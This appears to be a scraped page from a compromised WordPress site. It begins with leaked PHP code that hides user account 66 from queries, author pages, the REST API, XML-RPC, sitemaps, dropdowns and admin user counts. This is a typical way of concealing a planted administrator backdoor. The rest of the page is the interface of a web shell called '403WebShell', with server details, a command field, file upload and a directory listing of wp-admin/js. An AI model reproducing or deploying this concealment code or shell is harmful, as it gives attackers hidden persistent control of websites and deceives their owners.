add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/biotraubensaft/wp-admin/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
June 08 2026 15:24:41
deploy / www-data
0755
widgets
--
June 08 2026 15:24:41
deploy / www-data
0755
accordion.js
2.864 KB
June 08 2026 15:24:41
deploy / www-data
0644
accordion.min.js
0.74 KB
June 08 2026 15:24:41
deploy / www-data
0644
application-passwords.js
6.244 KB
June 08 2026 15:24:41
deploy / www-data
0644
application-passwords.min.js
2.953 KB
June 08 2026 15:24:41
deploy / www-data
0644
auth-app.js
5.66 KB
June 08 2026 15:24:41
deploy / www-data
0644
auth-app.min.js
2.035 KB
June 08 2026 15:24:41
deploy / www-data
0644
code-editor.js
17.542 KB
June 08 2026 15:24:41
deploy / www-data
0644
code-editor.min.js
3.46 KB
June 08 2026 15:24:41
deploy / www-data
0644
color-picker.js
9.539 KB
June 08 2026 15:24:41
deploy / www-data
0644
color-picker.min.js
3.404 KB
June 08 2026 15:24:41
deploy / www-data
0644
comment.js
2.851 KB
June 08 2026 15:24:41
deploy / www-data
0644
comment.min.js
1.284 KB
June 08 2026 15:24:41
deploy / www-data
0644
common.js
61.266 KB
June 08 2026 15:24:41
deploy / www-data
0644
common.min.js
23.205 KB
June 08 2026 15:24:41
deploy / www-data
0644
custom-background.js
3.354 KB
June 08 2026 15:24:41
deploy / www-data
0644
custom-background.min.js
1.178 KB
June 08 2026 15:24:41
deploy / www-data
0644
custom-header.js
1.976 KB
June 08 2026 15:24:41
deploy / www-data
0644
customize-controls.js
288.413 KB
June 08 2026 15:24:41
deploy / www-data
0644
customize-controls.min.js
109.689 KB
June 08 2026 15:24:41
deploy / www-data
0644
customize-nav-menus.js
111.46 KB
June 08 2026 15:24:41
deploy / www-data
0644
customize-nav-menus.min.js
47.141 KB
June 08 2026 15:24:41
deploy / www-data
0644
customize-widgets.js
70.046 KB
June 08 2026 15:24:41
deploy / www-data
0644
customize-widgets.min.js
27.407 KB
June 08 2026 15:24:41
deploy / www-data
0644
dashboard.js
27.018 KB
June 08 2026 15:24:41
deploy / www-data
0644
dashboard.min.js
8.654 KB
June 08 2026 15:24:41
deploy / www-data
0644
edit-comments.js
37.245 KB
June 08 2026 15:24:41
deploy / www-data
0644
edit-comments.min.js
15.151 KB
June 08 2026 15:24:41
deploy / www-data
0644
editor-expand.js
41.607 KB
June 08 2026 15:24:41
deploy / www-data
0644
editor-expand.min.js
13.136 KB
June 08 2026 15:24:41
deploy / www-data
0644
editor.js
43.999 KB
June 08 2026 15:24:41
deploy / www-data
0644
editor.min.js
12.778 KB
June 08 2026 15:24:41
deploy / www-data
0644
farbtastic.js
7.665 KB
June 08 2026 15:24:41
deploy / www-data
0644
gallery.js
5.413 KB
June 08 2026 15:24:41
deploy / www-data
0644
gallery.min.js
3.653 KB
June 08 2026 15:24:41
deploy / www-data
0644
image-edit.js
39.977 KB
June 08 2026 15:24:41
deploy / www-data
0644
image-edit.min.js
15.151 KB
June 08 2026 15:24:41
deploy / www-data
0644
inline-edit-post.js
20.2 KB
June 08 2026 15:24:41
deploy / www-data
0644
inline-edit-post.min.js
9.388 KB
June 08 2026 15:24:41
deploy / www-data
0644
inline-edit-tax.js
7.614 KB
June 08 2026 15:24:41
deploy / www-data
0644
inline-edit-tax.min.js
2.927 KB
June 08 2026 15:24:41
deploy / www-data
0644
iris.min.js
23.089 KB
June 08 2026 15:24:41
deploy / www-data
0644
language-chooser.js
0.869 KB
June 08 2026 15:24:41
deploy / www-data
0644
language-chooser.min.js
0.413 KB
June 08 2026 15:24:41
deploy / www-data
0644
link.js
4.759 KB
June 08 2026 15:24:41
deploy / www-data
0644
link.min.js
2.265 KB
June 08 2026 15:24:41
deploy / www-data
0644
media-gallery.js
1.272 KB
June 08 2026 15:24:41
deploy / www-data
0644
media-gallery.min.js
0.597 KB
June 08 2026 15:24:41
deploy / www-data
0644
media-upload.js
3.384 KB
June 08 2026 15:24:41
deploy / www-data
0644
media-upload.min.js
1.125 KB
June 08 2026 15:24:41
deploy / www-data
0644
media.js
6.606 KB
June 08 2026 15:24:41
deploy / www-data
0644
media.min.js
2.382 KB
June 08 2026 15:24:41
deploy / www-data
0644
nav-menu.js
61.149 KB
June 08 2026 15:24:41
deploy / www-data
0644
nav-menu.min.js
30.063 KB
June 08 2026 15:24:41
deploy / www-data
0644
password-strength-meter.js
4.137 KB
June 08 2026 15:24:41
deploy / www-data
0644
password-strength-meter.min.js
1.097 KB
June 08 2026 15:24:41
deploy / www-data
0644
password-toggle.js
1.308 KB
June 08 2026 15:24:41
deploy / www-data
0644
password-toggle.min.js
0.827 KB
June 08 2026 15:24:41
deploy / www-data
0644
plugin-install.js
6.92 KB
June 08 2026 15:24:41
deploy / www-data
0644
plugin-install.min.js
2.347 KB
June 08 2026 15:24:41
deploy / www-data
0644
post.js
39.537 KB
June 08 2026 15:24:41
deploy / www-data
0644
post.min.js
18.952 KB
June 08 2026 15:24:41
deploy / www-data
0644
postbox.js
18.493 KB
June 08 2026 15:24:41
deploy / www-data
0644
postbox.min.js
6.603 KB
June 08 2026 15:24:41
deploy / www-data
0644
privacy-tools.js
10.667 KB
June 08 2026 15:24:41
deploy / www-data
0644
privacy-tools.min.js
5.033 KB
June 08 2026 15:24:41
deploy / www-data
0644
revisions.js
33.915 KB
June 08 2026 15:24:41
deploy / www-data
0644
revisions.min.js
17.97 KB
June 08 2026 15:24:41
deploy / www-data
0644
set-post-thumbnail.js
0.855 KB
June 08 2026 15:24:41
deploy / www-data
0644
set-post-thumbnail.min.js
0.605 KB
June 08 2026 15:24:41
deploy / www-data
0644
site-health.js
13.555 KB
June 08 2026 15:24:41
deploy / www-data
0644
site-health.min.js
6.322 KB
June 08 2026 15:24:41
deploy / www-data
0644
site-icon.js
6.097 KB
June 08 2026 15:24:41
deploy / www-data
0644
site-icon.min.js
2.201 KB
June 08 2026 15:24:41
deploy / www-data
0644
svg-painter.js
3.203 KB
June 08 2026 15:24:41
deploy / www-data
0644
svg-painter.min.js
1.53 KB
June 08 2026 15:24:41
deploy / www-data
0644
tags-box.js
10.879 KB
June 08 2026 15:24:41
deploy / www-data
0644
tags-box.min.js
3.005 KB
June 08 2026 15:24:41
deploy / www-data
0644
tags-suggest.js
5.636 KB
June 08 2026 15:24:41
deploy / www-data
0644
tags-suggest.min.js
2.216 KB
June 08 2026 15:24:41
deploy / www-data
0644
tags.js
5.955 KB
June 08 2026 15:24:41
deploy / www-data
0644
tags.min.js
2.409 KB
June 08 2026 15:24:41
deploy / www-data
0644
theme-plugin-editor.js
25.563 KB
June 08 2026 15:24:41
deploy / www-data
0644
theme-plugin-editor.min.js
11.82 KB
June 08 2026 15:24:41
deploy / www-data
0644
theme.js
54.944 KB
June 08 2026 15:24:41
deploy / www-data
0644
theme.min.js
26.506 KB
June 08 2026 15:24:41
deploy / www-data
0644
updates.js
109.374 KB
June 08 2026 15:24:41
deploy / www-data
0644
updates.min.js
47.308 KB
June 08 2026 15:24:41
deploy / www-data
0644
user-profile.js
17.913 KB
June 08 2026 15:24:41
deploy / www-data
0644
user-profile.min.js
7.81 KB
June 08 2026 15:24:41
deploy / www-data
0644
user-suggest.js
2.247 KB
June 08 2026 15:24:41
deploy / www-data
0644
user-suggest.min.js
0.66 KB
June 08 2026 15:24:41
deploy / www-data
0644
widgets.js
22.557 KB
June 08 2026 15:24:41
deploy / www-data
0644
widgets.min.js
12.313 KB
June 08 2026 15:24:41
deploy / www-data
0644
word-count.js
7.516 KB
June 08 2026 15:24:41
deploy / www-data
0644
word-count.min.js
1.494 KB
June 08 2026 15:24:41
deploy / www-data
0644
xfn.js
0.723 KB
June 08 2026 15:24:41
deploy / www-data
0644
xfn.min.js
0.447 KB
June 08 2026 15:24:41
deploy / www-data
0644

Youez - 2016 - github.com/yon3zu
LinuXploit